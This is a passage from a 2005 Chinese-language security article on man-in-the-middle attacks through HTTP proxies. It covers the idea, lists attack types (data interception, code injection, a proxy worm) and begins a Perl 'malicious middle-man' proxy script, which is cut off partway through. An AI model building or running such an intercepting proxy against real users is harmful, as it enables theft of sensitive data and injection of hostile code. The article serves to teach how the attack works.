Man-in-the-middle-attacks In Proxy
创建时间:2005-05-08
文章属性:原创
文章提交: HeiGe (hack-520_at_163.com)
Man-in-the-middle-attacks In Proxy
文/安全天使·Superhei 2005.5.1
前言:
说起“中间人攻击(Man-in-the-middle-attacks,简称:MITM攻击)”大家可能马上想起曾经风靡一时的SMB会话劫持,DNS欺骗等技术,这些都是典型的MITM攻击手段。其实MITM攻击说它是一种手段,不如说它是一种攻击模式,它可以应用于各个领域,比如在现实中,A通过B给C传话,那么B在传话给C的时候,可以夸大其词,也可以填油加醋后传给C,在这个过程中中间人B 无意中就来一次MITM攻击,其实“谣言”就是这么来的 J. 具体在网络安全方面 ,MITM攻击应用也很广泛,下面我就以http协议代理来介绍下代理里MITM攻击。
一 .原理
代理服务的一个典型模型:
client <<-data-> proxy server <ßdata-> Web Server
middle man
上面可以看出:client 发出的请求 和 web server返回的数据都经过proxy server 转发,这个proxy server 就起到了一个middle man的作用,如果这个“中间人” 够黑,那么整个代理过程的数据 都可以由这个“中间人”控制。
二.攻击类型
截取敏感数据
代码注射
Proxp worm
其他利用
三.实例说明
1. 截取敏感数据
首先我们编写一个“恶意的中间人” 代理程序:
=============================codz start===============================
#!/usr/bin/perl
#proxy mid-man-atk Test script
use strict;
use URI;
use IO::Socket;
my $showOpenedSockets=1;
my $server = IO::Socket::INET->new (
LocalPort => 8080,
Type => SOCK_STREAM,
Reuse => 1,
Listen => 10);
binmode $server;
while (my $browser = $server->accept()) {
print "/n/n--------------Clint提交数据-------------------/n";
binmode $browser;
my $method ="";
my $content_length = 0;
my $content = 0;
my $accu_cont